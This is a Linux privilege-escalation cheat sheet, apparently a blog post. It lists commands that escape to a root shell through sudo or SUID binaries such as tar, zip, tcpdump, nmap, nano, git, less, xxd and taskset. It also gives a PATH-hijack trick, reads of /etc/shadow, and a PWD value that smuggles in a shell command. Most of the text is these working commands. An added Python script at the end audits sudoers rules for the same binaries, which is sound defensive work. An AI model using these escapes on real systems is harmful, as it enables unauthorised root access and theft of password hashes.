Root Privilege

How to gain root privilege on a Linux system!

Create a new ps file:
$ echo /bin/sh > ps
$ chmod +x ps
Create a new sh file:
$ echo /bin/sh > sh
$ chmod +x sh
Set the path:
$ export PATH=/var/www/backup:${PATH}
Run procwatch:
$ procwatch

Using zip command

$ cd /tmp
$ sudo zip test -T --unzip-command="sh -c /bin/bash"

Using tar command

$ sudo tar cf /dev/null test.tgz --checkpoint=1 --checkpoint-action=exec=/bin/bash
$ tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/sh

Using strace command

$ sudo strace -o/dev/null /bin/bash

Using tcpdump command

$ echo $'id\ncat /etc/shadow' > /tmp/.shell
$ chmod +x /tmp/.shell
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root

Using nmap command

$ echo "os.execute('/bin/sh')" > /tmp/shell.nse
$ sudo nmap --script=/tmp/shell.nse
OR:
$ nmap --interactive
nmap> !sh

Using scp command

$ sudo scp -S /path/yourscript x y

Using expect command

$ sudo expect
expect1.1> spawn sh
expect1.2> sh

Using nano command

$ sudo nano -s /bin/bash
Type your command in the editor, then hit CTRL+T (the spell-check key, which runs /bin/bash on the buffer).

Using git command

$ sudo git help status
Then, at the pager prompt, type: !/bin/bash

Using gdb/ftp command

$ sudo ftp
ftp> !/bin/sh

Using Less command
sudo less /etc/hosts

Using Man command
sudo man /etc/hosts


xxd is a Linux command that creates a hex dump of a given file. If the xxd binary has the SUID bit set, it reads files with the owner's privileges, and piping the dump back through xxd -r restores the original contents:
xxd "/etc/shadow" | xxd -r

taskset is a system binary; if it has the SUID bit set, it can start a shell that keeps the elevated privileges (-p tells sh not to drop them):
taskset 1 /bin/sh -p

export PWD=';/bin/bash'
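Every sudo entry above works because the granted command can spawn a shell, so the defensive check is to audit sudoers for exactly those binaries. The script below is an added example, not part of the original post: it parses sudoers-style rules and flags any that grant ALL or one of the shell-escape-capable commands the post lists. The sudoers text it runs on is constructed for the demo; the rule regex covers common one-line entries, not the full sudoers grammar.

```python
"""Audit sudoers rules for commands that are known shell escapes (added example)."""
import re

# Binaries the post shows escaping to a shell when run under sudo.
SHELL_ESCAPE_CMDS = {
    "zip", "tar", "strace", "tcpdump", "nmap", "scp", "expect",
    "nano", "git", "ftp", "less", "man", "xxd", "taskset",
}

# Matches:  who  host = (runas) [TAG:]... command[, command...]
# Simplified grammar; aliases, Defaults and multi-line rules are skipped.
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def audit_sudoers(text):
    """Return a list of (who, command, reason) for rules that allow a shell escape."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blanks
        if not line or line.startswith("Defaults") or line.split()[0].endswith("_Alias"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            if cmd == "ALL":                          # unrestricted sudo
                findings.append((m["who"], cmd, "unrestricted"))
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]  # basename of the command
            if binary in SHELL_ESCAPE_CMDS:
                findings.append((m["who"], cmd, "shell escape via " + binary))
    return findings

# Constructed sample sudoers content for the demo (not from a real host).
SAMPLE_SUDOERS = """\
Defaults env_reset
Cmnd_Alias SERVICES = /usr/bin/systemctl
root     ALL=(ALL:ALL) ALL
backup   ALL=(root) NOPASSWD: /usr/bin/tar
www-data ALL=(root) /usr/bin/zip, /usr/bin/git
alice    ALL=(root) /usr/bin/systemctl restart nginx
"""

if __name__ == "__main__":
    for who, cmd, why in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{who}: {cmd} ({why})")
```

On a real host, feed it the contents of /etc/sudoers and /etc/sudoers.d/* (read as root); each finding is a rule to replace with a narrower command or remove.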
